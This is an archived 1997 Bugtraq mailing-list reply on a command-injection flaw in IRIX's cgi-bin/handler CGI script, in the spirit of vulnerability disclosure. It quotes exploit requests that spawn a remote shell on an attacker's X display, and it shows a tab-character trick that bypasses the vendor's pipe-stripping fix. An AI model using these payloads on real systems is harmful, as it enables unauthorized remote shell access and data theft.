Bugtraq mailing list archives
Re: CPSR 7: IRIX WWW Server
From: lamontg () hitl washington edu (Lamont Granquist)
Date: Thu, 24 Jul 1997 14:15:20 -0700
On Thu, 24 Jul 1997, Thomas Walter wrote:
Trying 1.2.3.4... Connected to victim. Escape character is '^]'. GET /cgi-bin/handler/;/usr/sbin/xwsh -display enemy:0 -e /bin/csh|?data=Download UX:sh (sh): ERROR: Connection closed by foreign host. enemy%
s/xwsh/xterm/ and this works the same. to reiterate Razvan's follow-up to the original posting on the cgi-bin/handler issue, in Irix 6.3 (O2s) they attempted to fix this with the line: # trim off trailing pipes $doc =~ s/\|*$// ; which can be fooled by appending a <tab> char after the pipe, thus: GET /cgi-bin/handler/<tab>;xterm<tab>-display<tab>danish:0<tab>-e<tab> /bin/sh|<tab>?data=Download ^^^^^^ (one line, emphasis under the necessary change) which can be applied to the xwsh, or cat /etc/passwd attacks or whatever. this is not matched by the pattern s/\|*$//, but the appended tab does not change the behavior of perl's open(yadda, "yadda|") statement since whitespace following the '|' is ignored. Yuri's post to Bugtraq of Fri, 16 May 1997 #2551 at http://www.netspace.org/lsv-archive/bugtraq.html is a good read for more info on why SGIs /var/www/cgi-bin directory should be nuked with extreme prejudice... -- Lamont Granquist <lamontg () hitl washington edu> (206)616-1469 fax:(206)543-5380 Human Interface Technology Lab. University of Washington. Seattle, WA PGP pubkey: finger lamontg () near hitl washington edu
Current thread:
- Re: request-route, (continued)
- Re: request-route Zoltan Hidvegi (Jul 28)
- Re: request-route Eric Bennett (Jul 29)
- Re: request-route John Macdonald (Jul 29)
- Re: request-route Kragen Sitaker (Jul 30)
- Re: request-route John Macdonald (Jul 31)
- perl fingerd stupidity Chris Terry (Jul 31)
- HP Security Bulletins Digest Aleph One (Jul 31)
- Re: request-route Mihai SANDU (Jul 26)
- Netspace Singapore Privacy Bug Aleph One (Jul 26)
- Re: your mail Alan Cox (Jul 27)
- Re: Solaris2.5.1 dtlogin core Andrew Hobgood (Jul 24)